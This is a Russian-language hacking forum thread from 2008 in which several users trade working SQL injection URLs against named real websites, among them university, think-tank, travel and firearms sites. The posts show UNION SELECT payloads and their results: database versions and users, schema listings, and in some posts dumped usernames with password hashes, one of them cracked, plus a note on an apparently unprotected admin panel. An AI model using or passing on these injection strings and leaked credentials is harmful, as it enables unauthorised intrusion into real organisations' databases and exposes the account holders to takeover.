18.08.2008, 10:12
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Сообщение от Glazz
Сайт группы Лялис Трубецкий
http://www.lyapis.com/anons.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.lyapis.com/anons.php?id=5+UNION+SELECT+1,2,concat_ws(0x3a,version(),database(),user()),4,5/*
4.1.22-standard:lyapis_lyapis:lyapis_lyapis@localhost
4
5
|
|
|
18.08.2008, 13:12
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Академия Наса.. )))
http://www.nasa-academy.org/db/yearbookview.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(0x3a3a,'<b>' ,middlename,0x3a3a,login,0x3a3a,password,0x3a3a,pa ssword_expire,'</b>'),10,11,12,13+from+academy.alumni+limit+31,60/*
Выборка по юзерам.
http://www.nasa-academy.org/db/login.php аутентификация
Шняга: х*** пойми как захеширован пароль. ибо некоторые побдираются, но система не логинится. МБ дабл хеш?
К тому же походу file_priv разрешены, но пути х** нарыл...
|
|
|
|
18.08.2008, 15:46
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
www.mirtravel.com
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(table_name,0x3a,column_name)+FROM+information_schema.columns/*
Код:
http://www.mirtravel.com/searcht.php?kstr=109&sent=1&ktyp=-1+UNION+SELECT+1,concat(nusr,0x3a,pusr)+FROM+usr/*
mir:4b53ed9250ece8ed
admin:e1eba9bbbb04da14e0f0b1cec9eea708: zzz123
Это логин под форум по ходу, а админка без пароля штоле http://www.mirtravel.com/admin/ 
Последний раз редактировалось Ponchik; 18.08.2008 в 16:01..
|
|
|
|
18.08.2008, 18:24
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.aei-brookings.org/events/page.php?id=-152+union+select+1,2,version()/*
version: 4.0.25-standard-log
database: aei_brooking
user: aei_brookings@10.225.135.70
http://aviation-safety.net/wikibase/wiki.php?id=-16509+union+select+1,version(),3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1,2/*
version:mysql-s-22-4.1. ???
http://www.davisvisitor.com/sub.php?id=-1+union+select+1,2,3,4,5,version()/*
version: MySQL 4.0.16
http://wineserver.ucdavis.edu/people/faculty.php?id=-2+union+select+1,2,3,4,5,TABLE_SCHEMA,COLUMN_NAME, 8,9,0,1,2,3,4,5,6,7,8,9+from+information_schema.CO LUMNS+WHERE+TABLE_NAME=%22users%22+limit+26,1/*
version: MySQL 5.0.27-standard
http://www.coinsportal.ru/Bibliotheka/Article.php?ID=-1+union+select+1,2,version(),4,5/*
version:MySQL 4.0.18
|
|
|
|
19.08.2008, 01:14
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.roguegovernment.com/news.php?id=9770+union+select+1,version(),3,4,5,6, 7,8,9,0/*
версия:mysql4.1.22-standard
выод между тегами title
PR: 5
|
|
|
|
19.08.2008, 09:49
|
|
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838
Репутация:
770
|
|
http://www.vdv.gcg.ru/forum/index.php?id=-2304+union+select+concat_ws(0x3a,version(),user(), database())--
http://www.iclogic.com/catalogue/organisations/showorg.php?id=-1372+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15--
edited: http://www.aktem.ru/frame.php?action=book&ID=-1111+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8--
Версии 4.*
Последний раз редактировалось Calcutta; 19.08.2008 в 10:44..
|
|
|
|
19.08.2008, 12:29
|
|
Новичок
Регистрация: 20.12.2007
Сообщений: 19
Провел на форуме:
373780
Репутация:
52
|
|
Супермаркет уникального контента Textsale.ru:
http://www.textsale.ru/u-1+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*.html
http://www.textsale.ru/canu-1+union+select+1,2,version(),4,5/*.html
Путь:/home/l/loveumru/public_html/textsale/public_html/
Больше ничего узнать не удается, т.к. хостер фильтрует 'from'.
|
|
|
|
19.08.2008, 14:55
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065
Репутация:
869
|
|
Код:
http://www.nottingham.ac.uk/library/library-sites.php?id=8+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8+LIMIT+1,1/*
4.0.20-max-log:ulzljw_faqdb:ulzljw_www@portal1.is.nottingham. ac.uk
8 |
|
|
|
19.08.2008, 15:15
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.danwessonfirearms.com/product_detail.php?id=-48+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6/*
verion:4.0.21-standard
|
|
|
|
19.08.2008, 19:09
|
|
Постоянный
Регистрация: 13.02.2007
Сообщений: 406
Провел на форуме:
2706059
Репутация:
206
|
|
http://www.phpbuddy.com/article.php?id=-8+union+select+version(),2,3,4,5,6/*
version: 4.1.21-standard
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [AVT]](/avatars/avatar46792.jpg?823420){kind=avatar}
Комбинированный вид
